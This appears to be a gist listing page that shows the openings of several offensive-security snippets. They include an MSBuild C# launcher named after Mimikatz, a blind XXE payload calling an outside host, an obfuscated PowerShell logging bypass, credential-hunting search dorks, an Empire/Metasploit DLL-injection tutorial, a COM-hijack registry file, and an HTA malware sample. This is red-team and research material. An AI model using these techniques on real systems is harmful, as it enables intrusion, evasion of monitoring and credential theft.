This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0 | 245272 | |
---|---|---|
32:f9:38:a2:39:d0:c5:f5:ba:bd:b7:75:2b:00:f6:ab | 197846 | |
d0:db:8a:cb:74:c8:37:e4:9e:71:fc:7a:eb:d6:40:81 | 152046 | |
34:47:0f:e9:1a:c2:eb:56:eb:cc:58:59:3a:02:80:b6 | 140777 | |
df:17:d6:57:7a:37:00:7a:87:5e:4e:ed:2f:a3:d5:dd | 91904 | |
81:96:a6:8c:3a:75:f3:be:84:5e:cc:99:a7:ab:3e:d9 | 80499 | |
7c:a8:25:21:13:a2:eb:00:a6:c1:76:ca:6b:48:6e:bf | 78172 | |
1c:1e:29:43:d2:0c:c1:75:40:05:30:03:d4:02:d7:9b | 71851 | |
8b:75:88:08:41:78:11:5b:49:68:11:42:64:12:6d:49 | 70786 | |
c2:77:c8:c5:72:17:e2:5b:4f:a2:4e:e3:04:0c:35:c9 | 68654 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- This inline task executes c# code. --> | |
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml --> | |
<Target Name="Hello"> | |
<SharpLauncher > | |
</SharpLauncher> | |
</Target> | |
<UsingTask | |
TaskName="SharpLauncher" | |
TaskFactory="CodeTaskFactory" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
========================================== | |
CURL COMMAND | |
========================================== | |
Format curl [options] [URL...] | |
Quick Ref: | |
curl -X POST http://example.com/ <= Method option and URL (Options come before or after URL) | |
-H "Authorization: <data>" <= Add HTTP Header (like Authorization) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# ScriptBlock Logging Bypass | |
# @cobbr_io | |
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static') | |
If ($GroupPolicyField) { | |
$GroupPolicyCache = $GroupPolicyField.GetValue($null) | |
If ($GroupPolicyCache['ScriptB'+'lockLogging']) { | |
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0 | |
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0 | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
admin account info" filetype:log | |
!Host=*.* intext:enc_UserPassword=* ext:pcf | |
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd | |
"AutoCreate=TRUE password=*" | |
"http://*:*@www” domainname | |
"index of/" "ws_ftp.ini" "parent directory" | |
"liveice configuration file" ext:cfg -site:sourceforge.net | |
"parent directory" +proftpdpasswd | |
Duclassified" -site:duware.com "DUware All Rights reserved" | |
duclassmate" -site:duware.com |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Empire and Metasploit 101 | |
Goal: Use Empire and metasploit in example situation of network exploitation and post-exploitation host enumeration. We will exploit a network service on a Windows 7 VM, and then use our low-privilege shell to then execute an empire powershell stager, which will create an Empire agent on the local Windows 7 VM. After this, we will look through the various options available as an Empire agent. | |
Following this, we will generate a DLL stager within Empire, and then use our existing meterpreter session on the Windows 7 VM to perform a DLL injection attack, to inject another Empire agent, directly into memory. | |
Pre-Stuff: Empire is not just for windows. It has python based agents that can run on OS X and Linux. It's communication profile between agents and listeners is configurable, similar to CobaltStrikes. You can use pre-built or custom-made ones to employ such functionality. Empire is designed to stay off disk and in memory as much as possible. Empire does contain modules that will |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Windows Registry Editor Version 5.00 | |
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00] | |
@="AtomicRedTeam" | |
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID] | |
@="{00000001-0000-0000-0000-0000FEEDACDC}" | |
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam] | |
@="AtomicRedTeam" | |
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID] | |
@="{00000001-0000-0000-0000-0000FEEDACDC}" | |
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## uploaded by @JohnLaTwC | |
## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde | |
<html> | |
<head> | |
<script language="JScript"> | |
window.resizeTo(1, 1); | |
window.moveTo(-2000, -2000); | |
window.blur(); | |
try |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# This idea originated from this blog post on Invoke DSC Resources directly: | |
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/ | |
<# | |
$MOFContents = @' | |
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref | |
{ | |
ResourceID = "[Script]ScriptExample"; | |
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True"; | |
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True"; |
OlderNewer